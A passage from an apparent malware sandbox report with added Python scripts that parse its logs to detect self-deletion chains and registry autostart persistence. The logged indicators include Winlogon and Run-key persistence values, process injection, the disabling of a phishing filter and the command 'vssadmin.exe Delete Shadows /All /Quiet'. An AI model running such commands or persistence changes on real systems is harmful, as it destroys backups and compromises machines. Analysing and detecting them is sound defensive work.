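    """True when the command line carries an 8.3 short-name component such as EXTENS~1."""
    return re.search(r"~\d+(?=\.|\\|\s|$)", cmdline) is not None


def ancestors(by_pid, pid):
    """Yield (pid, event) for each known ancestor of pid, nearest first."""
    seen = set()
    ppid = by_pid[pid]["ppid"]
    while ppid in by_pid and ppid not in seen:
        seen.add(ppid)
        yield ppid, by_pid[ppid]
        ppid = by_pid[ppid]["ppid"]


def find_self_delete(events):
    """(attrib_pid, ancestor_pid) pairs where attrib strips the attributes of an ancestor's own image."""
    by_pid = {ev["pid"]: ev for ev in events}
    findings = []
    for ev in events:
        if ev["image"].lower().rsplit("\\", 1)[-1] != "attrib.exe":
            continue
        if not clears_protection(ev["cmdline"]):
            continue
        target = attrib_target(ev["cmdline"])
        if target is None:
            continue
        for apid, anc in ancestors(by_pid, ev["pid"]):
            if anc["image"].lower() == target.lower():
                findings.append((ev["pid"], apid))
    return findings


if __name__ == "__main__":
    print("self-delete:", find_self_delete(EVENTS))
    print("8.3 paths in:", [ev["pid"] for ev in EVENTS if uses_short_names(ev["cmdline"])])
```

Only the first attrib.exe is reported: its target is the image of its grandparent, the sample. The second attrib.exe acts on the batch file, which is never a process image, so it is left to the short-name check, which flags the cmd.exe line instead.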

Network

N/A

Files

memory/3032-0-0x0000000000230000-0x000000000028E000-memory.dmp

memory/3032-2-0x0000000000400000-0x000000000045D000-memory.dmp

memory/3032-4-0x0000000000400000-0x000000000045D000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\EXTENS~1\B0B9.tmp.bat

MD5 7f6463b850974235d535591d85ef050d
SHA1 3f878c55c2bc75d2904e2bc4c99ff741bc4f1adf
SHA256 67ec6630dce786263c06f309f44dcb7658c19c53df365db7ae48e33100028491
SHA512 690b95c127b07fd7e3c30440daf4f67b02a0632770f4229e47c1d633f2e2410d166b44795ef4a4582f7809c93139ed68debed21fda8e83db0168acc31ef4bafa

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:06

Platform

win7-20240708-en

Max time kernel

600s

Max time network

360s

Command Line

C:\Windows\Explorer.EXE

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Roaming\\msconfig.dat" C:\Windows\syswow64\svchost.exe N/A
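Two different autostart mechanisms appear in this report: behavioral29 writes a Run key value named "Windows Security" pointing at delta.exe under AppData\Local, and the detonation above appends a second program to the per-user Winlogon shell value, so that Winlogon starts explorer.exe and then C:\Users\Admin\AppData\Roaming\msconfig.dat at logon. The script below is an added example, not part of the report or of the sandbox; it parses the "Set value" indicator lines as printed in this report (note the doubled backslashes in the data field), normalises the SID-keyed hive to HKCU, and for each autostart location extracts the persisted payload and whether it lives in a user-writable path. The line format and the two registry entries are taken from this page; the classification logic is the example's own.

```python
import re

# Constructed input: the three registry indicator lines from the behavioral29 and
# behavioral2 signatures above, copied in the report's own format.
SAMPLE_INDICATORS = r"""
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Security = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\delta.exe" C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\AppData\Local\Temp\f31bfe95e31d761459b885052d35ba5e25ab19333378fb72b12efd675f6018d7_.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Roaming\\msconfig.dat" C:\Windows\syswow64\svchost.exe N/A
"""

# "Set value (<type>) <key>\<name> = "<data>" <writing process> N/A"
INDICATOR_RE = re.compile(
    r'^Set value \((\w+)\) (\\REGISTRY\\.+?)\\([^\\]+?) = "(.*?)" (\S+) N/A$')
USER_SID_RE = re.compile(r"^\\REGISTRY\\USER\\S-1-5-21-[\d-]+(?=\\|_Classes)")


def normalize_key(key):
    """\\REGISTRY\\USER\\<sid>\\... -> HKCU\\..., \\REGISTRY\\MACHINE\\... -> HKLM\\..."""
    key = USER_SID_RE.sub("HKCU", key)
    return key.replace("\\REGISTRY\\MACHINE", "HKLM")


def unescape(data):
    """The report prints string data with doubled backslashes."""
    return data.replace("\\\\", "\\")


def classify(key, name, data):
    """Return (mechanism, payload paths) for autostart locations, (None, []) otherwise."""
    k = key.lower()
    if k.endswith(("\\currentversion\\run", "\\currentversion\\runonce")):
        return "Run key", [data]
    if k.endswith("\\currentversion\\winlogon") and name.lower() in ("shell", "userinit"):
        # comma-separated list; Winlogon launches every entry, the first is the legitimate one
        parts = [p.strip() for p in data.split(",") if p.strip()]
        return "Winlogon " + name.lower(), parts[1:]
    return None, []


def parse_indicators(text):
    findings = []
    for line in text.splitlines():
        m = INDICATOR_RE.match(line.strip())
        if not m:
            continue
        _vtype, key, name, data, proc = m.groups()
        key, data = normalize_key(key), unescape(data)
        mechanism, payloads = classify(key, name, data)
        if mechanism is None:
            continue
        findings.append({
            "mechanism": mechanism,
            "key": key,
            "name": name,
            "payloads": payloads,
            "writer": proc,
            "user_writable": any("\\appdata\\" in p.lower() for p in payloads),
        })
    return findings


if __name__ == "__main__":
    for f in parse_indicators(SAMPLE_INDICATORS):
        print(f["mechanism"], f["key"], f["name"], f["payloads"], "written by", f["writer"])
```

Both payloads sit under the user's AppData tree, and the Winlogon entry is written by an injected svchost.exe rather than by the dropped executable, so the writing process alone is not a reliable attribution signal; the value content is.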

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2696 set thread context of 2532 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ctfmon.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\SysWOW64\ctfmon.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\svchost.exe N/A
N/A N/A C:\Windows\syswow64\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2696 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe
PID 2696 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe
PID 2696 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe
PID 2696 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe
PID 2696 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe
PID 2696 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe
PID 2696 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe
PID 2696 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe
PID 2696 wrote to memory of 2532 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe
PID 2532 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Windows\explorer.exe
PID 2532 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Windows\explorer.exe
PID 2532 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Windows\explorer.exe
PID 2532 wrote to memory of 2296 N/A C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe C:\Windows\explorer.exe
PID 2296 wrote to memory of 1212 N/A C:\Windows\explorer.exe C:\Windows\Explorer.EXE
PID 1212 wrote to memory of 2760 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\svchost.exe
PID 1212 wrote to memory of 2760 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\svchost.exe
PID 1212 wrote to memory of 2760 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\svchost.exe
PID 1212 wrote to memory of 2760 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\svchost.exe
PID 1212 wrote to memory of 2760 N/A C:\Windows\Explorer.EXE C:\Windows\syswow64\svchost.exe
PID 2760 wrote to memory of 2924 N/A C:\Windows\syswow64\svchost.exe C:\Windows\SysWOW64\ctfmon.exe
PID 2760 wrote to memory of 2924 N/A C:\Windows\syswow64\svchost.exe C:\Windows\SysWOW64\ctfmon.exe
PID 2760 wrote to memory of 2924 N/A C:\Windows\syswow64\svchost.exe C:\Windows\SysWOW64\ctfmon.exe
PID 2760 wrote to memory of 2924 N/A C:\Windows\syswow64\svchost.exe C:\Windows\SysWOW64\ctfmon.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe

"C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe"

C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe

C:\Users\Admin\AppData\Local\Temp\DgH5SjZFleOYoBTyxcgMDlZF9brN1mDI.exe

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\syswow64\svchost.exe

"C:\Windows\syswow64\svchost.exe"

C:\Windows\SysWOW64\ctfmon.exe

ctfmon.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 fsbps.ru udp
US 8.8.8.8:53 cwnlz.ru udp

Files

memory/2696-1-0x0000000000220000-0x0000000000221000-memory.dmp

memory/2696-0-0x0000000000400000-0x0000000000471000-memory.dmp

memory/2532-2-0x0000000000400000-0x0000000000415000-memory.dmp

memory/2696-13-0x0000000000400000-0x0000000000471000-memory.dmp

memory/2532-12-0x0000000000400000-0x0000000000415000-memory.dmp

memory/2532-10-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2532-8-0x0000000000400000-0x0000000000415000-memory.dmp

memory/2532-6-0x0000000000400000-0x0000000000415000-memory.dmp

memory/2532-4-0x0000000000400000-0x0000000000415000-memory.dmp

memory/2532-15-0x0000000000400000-0x0000000000415000-memory.dmp

memory/2532-16-0x0000000000400000-0x0000000000415000-memory.dmp

memory/2532-18-0x0000000000400000-0x0000000000415000-memory.dmp

memory/2532-17-0x0000000000400000-0x0000000000415000-memory.dmp

memory/2296-27-0x00000000FFB50000-0x00000000FFE10000-memory.dmp

memory/2296-25-0x0000000000030000-0x0000000000040000-memory.dmp

memory/1212-22-0x0000000002AB0000-0x0000000002AB9000-memory.dmp

memory/2532-21-0x0000000000400000-0x0000000000415000-memory.dmp

memory/2760-28-0x00000000000C0000-0x00000000000C9000-memory.dmp

memory/2760-31-0x00000000000C0000-0x00000000000C9000-memory.dmp

memory/2760-34-0x00000000000C0000-0x00000000000C9000-memory.dmp

memory/2296-46-0x00000000FFB50000-0x00000000FFE10000-memory.dmp

memory/2760-48-0x00000000000C0000-0x00000000000C9000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:09

Platform

win7-20240903-en

Max time kernel

599s

Max time network

601s

Command Line

"C:\Users\Admin\AppData\Local\Temp\EntrateSetup.exe"

Signatures

Deletes shadow copies

ransomware defense_evasion impact execution

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\apoloqop = "\"C:\\Windows\\uricvwef.exe\"" C:\Windows\SysWOW64\explorer.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\EntrateSetup.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2384 set thread context of 2104 N/A C:\Users\Admin\AppData\Local\Temp\EntrateSetup.exe C:\Windows\SysWOW64\explorer.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\uricvwef.exe C:\Windows\SysWOW64\explorer.exe N/A
File created C:\Windows\uricvwef.exe C:\Windows\SysWOW64\explorer.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\EntrateSetup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\vssadmin.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Modifies Internet Explorer Phishing Filter

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\PhishingFilter C:\Windows\SysWOW64\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\PhishingFilter\EnabledV8 = "0" C:\Windows\SysWOW64\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\PhishingFilter\EnabledV9 = "0" C:\Windows\SysWOW64\explorer.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\EntrateSetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EntrateSetup.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\EntrateSetup.exe

"C:\Users\Admin\AppData\Local\Temp\EntrateSetup.exe"

C:\Windows\SysWOW64\explorer.exe

"C:\Windows\system32\explorer.exe"

C:\Windows\SysWOW64\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 money-waterfall.ru udp

Files

memory/2384-0-0x00000000022E0000-0x0000000002630000-memory.dmp

memory/2384-10-0x0000000000390000-0x0000000000391000-memory.dmp

memory/2384-9-0x0000000000390000-0x0000000000391000-memory.dmp

memory/2384-8-0x0000000000390000-0x0000000000391000-memory.dmp

memory/2384-7-0x0000000000390000-0x0000000000391000-memory.dmp

memory/2384-6-0x0000000000390000-0x0000000000391000-memory.dmp

memory/2384-5-0x0000000000390000-0x0000000000391000-memory.dmp

memory/2384-2-0x0000000000400000-0x0000000000445000-memory.dmp

memory/2384-1-0x0000000000390000-0x0000000000391000-memory.dmp

memory/2104-12-0x0000000000100000-0x000000000013C000-memory.dmp

memory/2104-13-0x0000000000100000-0x000000000013C000-memory.dmp

memory/2384-17-0x0000000000400000-0x0000000000445000-memory.dmp

C:\ProgramData\egynegorelydakuf\01000000

MD5 344d179eff7427801b599847c63d232a
SHA1 d363462418f38d8f75361469429a4143b2f803f4
SHA256 99a0358cbbd42544801443e0d729cc1ac6d983da93d248c99170b57c66fd31bc
SHA512 e2e5e6784fe9ff7fbebc118354b1989552b41a650413a2723a402d2f1badabebb72399ff9bfc405a3cedfd03dddf6a4e7144b319eca05dff726cc52369dacc03

memory/2104-21-0x0000000000100000-0x000000000013C000-memory.dmp

memory/2104-24-0x0000000000100000-0x000000000013C000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-22 03:25

Reported

2024-11-22 14:10

Platform

win7-20241010-en

Max time kernel

599s

Max time network

604s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Program Files (x86)\\Windows\\Error file remover\\fatalerror.exe" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Program Files (x86)\\Windows\\Error file remover\\fatalerror.exe" C:\Windows\system32\msiexec.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Windows\Error file remover\fatalerror.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\O: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\N: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\A: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\V: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\X: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\Q: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\Z: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\K: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\G: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\H: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\I: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\SysWOW64\msiexec.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\ErrorFileRemover.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\SysWOW64\msiexec.exe N/A

